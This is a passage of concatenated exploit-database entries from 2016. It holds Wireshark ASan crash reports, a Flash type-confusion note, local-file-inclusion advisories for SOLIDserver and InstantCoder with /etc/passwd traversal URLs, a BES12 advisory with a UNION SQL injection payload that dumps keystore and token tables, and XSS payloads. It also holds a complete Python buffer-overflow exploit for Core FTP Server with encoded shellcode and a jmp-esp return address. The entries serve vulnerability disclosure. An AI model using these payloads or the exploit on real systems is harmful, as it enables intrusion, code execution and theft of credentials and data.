=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39484.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=640
There is a type confusion vulnerability in the SimpleButton constructor. Flash stores an empty button to use to create buttons for optimization reasons. If this object is created using a SWF tag before it is created in the Button class, and it not of type Button, type confusion can occur.
A SWF needs to be altered in a hex editor to reproduce this issue. To start, build button.fla. This is a swf with the code:
var sb = new SimpleButton();
and a font attached. Decompress the swf using flasm -x button.swf, and then replace all occurrences of the font ID (0x0001) in the three tags that use it with the ID of the empty button object (0xfff6).
When the button is created, the font will be type confused with a button.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39476.zip
Title: SOLIDserver <=5.0.4 - Local File Inclusion Vunerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: SOLIDserver
Tested Version: : 5.0.4 and 4.0.2
Vendor: efficient IP http://www.efficientip.com
Google Dork: SOLIDserver login
Date: 17 Feb 2016
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
About Product :
---------------
EfficientIP's IP Address Management (IPAM) solution adapts to business and IT goals and objectives by allowing the creation of specific IPAM and VLANs deployment processes.
SOLIDserver™ IPAM is a unified solution that allows you to design, deploy, and manage the IP addressing plan automatically applying allocation rules and simplifying deployments.
Vulnerability Details:
----------------------
Based on a code review done on the product , this product doesn't have any observation on some parameters, that make the attacker able to read file contents.
PoC 1:
-----
https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd
or
view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd
PoC 2 : [login authentication required]
------
https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
#EOF
Document Title:
===============
InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1738
Release Date:
=============
2016-02-22
Vulnerability Laboratory ID (VL-ID):
====================================
1738
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
for your to code and debug web apps on your lovely iPhone and iPad.
(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2016-02-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shumin Sun
Product: InstantCoder - iOS (Web-Application) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject own
files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
inject the lfi payload by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./toolkit/upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2
A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device.
The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is
POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
variable is not encoded or parsed. Thus allows an attacker to inject to unauthorized access the local system or app path.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./listFiles
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Vulnerable Source
javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Content-Length[819]
Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------29343138867419
Content-Disposition: form-data; name="path"
-----------------------------29343138867419
Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[4995]
Date[Mon, 22 Feb 2016 08:33:04 GMT]
Reference(s):
http://localhost:8080/toolkit/upload
http://localhost:8080/toolkit/index.html
1.2
Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
PoC: Vulnerable Source
<p></p>
<div id="list-file"><a href="javascript:changePath("/.././../../../../../../../../../../etc/%00");">
<div class="folder"><img><iframe></div></a></iframe></div></a></div>
</div>
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[162]
Date[Mon, 22 Feb 2016 08:09:34 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:37 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:45 GMT]
Reference(s):
http://localhost:8080/listFiles
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
1.2
The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
#-*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link:
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : Buffer overflow
[+] Detail :
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More]
[-] 'Log filename(include path)' field is no limit to the length and does not check the length
[-] Insert string "A"*1500 and press Ok, OK
[-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
'''
import struct
junk = "A" * 312
EIP = struct.pack("<L",0x7795163b) # USER32!gSharedInfo+0x181fb:
# 7795163b ffe4 jmp esp
nop = "\x90" * 10
#windows/exec calc.exe
#encode : alpha_mixed
sehll = (
"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)
payload = junk + EIP + nop + sehll
with open("CoreFTPServer_Ex.txt","wb") as f :
f.write(payload)
Source: https://code.google.com/p/google-security-research/issues/detail?id=656
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
READ of size 4 at 0x7f72db15e078 thread T0
#0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
#1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
#2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
#3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
#8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
#9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
#42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#43 0x5264eb in process_packet wireshark/tshark.c:3728:5
#44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#45 0x515daf in main wireshark/tshark.c:2197:13
0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
Shadow bytes around the buggy address:
0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5092==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39482.zip
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4
CVE: CVE-2016-1914 and CVE-2016-1915
PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+-----------+
|Description|
+-----------+
Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including
unauthenticated SQL
injection and reflected cross site scripting.
Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.
+------------+
|Exploitation|
+------------+
*SQL Injection*
The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:
/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image
This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.
The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.
https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
The technique above can be used to download any database table available
to the BES12 database user.
Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.
It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.
*Reflected Cross Site Scripting*
Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.
The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:
https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>
+----------+
| Solution |
+----------+
Upgrade to BES12.4.
+-------------------+
|Disclosure Timeline|
+-------------------+
Initial disclosure to Blackberry – 19 Nov 2015
Disclosure receipt confirmed by Blackberry – 19 Nov 2015
Request for update from Blackberry – 7 Dec 2015
Vulnerabilities confirmed by Blackberry – 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
BES12.4 released – 29 Jan 2016
Advisory released – 15 Feb 2016
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com
Source: https://code.google.com/p/google-security-research/issues/detail?id=654
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
READ of size 4 at 0x7fd688698b10 thread T0
#0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
#1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
#2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
#3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
#4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
#5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
#6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
